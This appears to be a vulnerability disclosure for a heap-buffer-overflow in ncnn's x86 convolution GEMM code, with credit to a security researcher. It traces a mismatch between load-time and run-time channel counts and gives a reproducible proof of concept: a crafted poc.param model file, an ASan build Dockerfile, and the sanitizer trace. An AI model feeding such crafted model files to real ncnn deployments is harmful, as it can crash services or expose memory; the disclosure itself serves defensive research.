Model-Triggered Heap Buffer Overflow in x86 GEMM
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/convolution_im2col_gemm.h:3315 in convolution_gemm_transB_packed_tile
Sanitizer verdict: heap-buffer-overflow
Summary
A crafted .param/.bin pair makes the x86 convolution use one channel count when it transforms the weights at load time and a completely different one when it executes, so the GEMM inner loop reads past the end of the transformed-weight buffer and ncnnoptimize dies with a heap-buffer-overflow. The attacker declares a Convolution with num_output=1, a 1x1 kernel and weight_data_size=1 (implying one input channel) while feeding it a blob with 1000 channels. Convolution_x86::create_pipeline sizes the packed weight matrix AT from the declared weights, but convolution_im2col_gemm recomputes the reduction length from the actual input blob, giving a 1000x oversized loop over a 1092-byte allocation.
Detail
The untrusted fields are weight_data_size (param key 6), num_output (key 0), the kernel sizes, and the shape of the upstream Input blob. Convolution_x86::create_pipeline derives the channel count arithmetically from the declared weight blob, num_input = weight_data_size / kernel_size / num_output = 1 / 1 / 1 = 1, and passes that to convolution_im2col_gemm_transform_kernel, which sizes AT with K = inch * maxk. At execution time the same value is recomputed from the tensor that actually arrives, and the two are never reconciled:
// src/layer/x86/convolution_im2col_gemm.h:5510
const int M = outch;
const int K = inch * maxk;
// src/layer/x86/convolution_im2col_gemm.h:5563
AT.create(TILE_K * TILE_M, (K + TILE_K - 1) / TILE_K, (M + TILE_M - 1) / TILE_M);
// src/layer/x86/convolution_im2col_gemm.h:5589
const int K = bottom_blob.c * bottom_blob.elempack * maxk;
// src/layer/x86/convolution_im2col_gemm.h:5651
const Mat AT_tile = AT.channel(i / TILE_M).row_range(k / TILE_K, 1);
With the PoC, load time sees K = 1 * 1 = 1, so AT gets a single row per output channel — a 1092-byte allocation (1024 bytes of tile data plus the refcount and the 64-byte over-read tail). Forward sees K = bottom_blob.c * elempack * maxk = 1000, so the for (int k = 0; k < K; k += TILE_K) loop iterates nn_K times and row_range(k / TILE_K, 1) starts handing out rows that were never allocated as soon as k / TILE_K >= 1.
Each tile is then consumed by convolution_gemm_transB_packed_tile, whose inner reduction dereferences the packed A pointer once per kk:
// src/layer/x86/convolution_im2col_gemm.h:3311
const float* pA = pAT;
int kk = 0;
for (; kk < max_kk; kk += 1)
{
sum += pA[0] * pB[0];
pA += 1;
pB += 1;
}
max_kk is min(K - k, TILE_K) computed from the runtime K = 1000, so pA marches straight through the end of the 1092-byte AT region; ASan reports the 4-byte read at offset 1092 and aborts ncnnoptimize inside ModelWriter::shape_inference().
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-model-triggered-heap-buffer-overflow-in-x86-gemm && cd ncnn-poc-model-triggered-heap-buffer-overflow-in-x86-gemm
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=1 1=1 2=1000
Convolution conv 1 1 data out 0=1 1=1 6=1
PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51a000000ac4 at pc 0x6183e5938db0 bp 0x7ffd7e34d970 sp 0x7ffd7e34d960
READ of size 4 at 0x51a000000ac4 thread T0
#0 0x6183e5938daf in convolution_gemm_transB_packed_tile /ncnn/src/layer/x86/convolution_im2col_gemm.h:3315
#1 0x6183e599ad4a in convolution_im2col_gemm /ncnn/src/layer/x86/convolution_im2col_gemm.h:5657
#2 0x6183e604c857 in ncnn::Convolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:733
#3 0x6183e5213f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#4 0x6183e5205b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#5 0x6183e52659e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#6 0x6183e50f73c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#7 0x6183e5174eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#8 0x77898d6961c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x77898d69628a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#10 0x6183e50f4624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x51a000000ac4 is located 0 bytes after 1092-byte region [0x51a000000680,0x51a000000ac4)
allocated by thread T0 here:
#0 0x77898dd0ff1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x6183e51c592d in fastMalloc /ncnn/src/allocator.h:62
#2 0x6183e51c592d in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
#3 0x6183e5990a40 in convolution_im2col_gemm_transform_kernel /ncnn/src/layer/x86/convolution_im2col_gemm.h:5563
#4 0x6183e6041734 in ncnn::Convolution_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/convolution_x86_avx512.cpp:472
#5 0x6183e5260c96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
#6 0x6183e5174c34 in main /ncnn/tools/ncnnoptimize.cpp:2793
#7 0x77898d6961c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x77898d69628a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x6183e50f4624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/x86/convolution_im2col_gemm.h:3315 in convolution_gemm_transB_packed_tile
Credit
Zheng Yu @ DepthFirst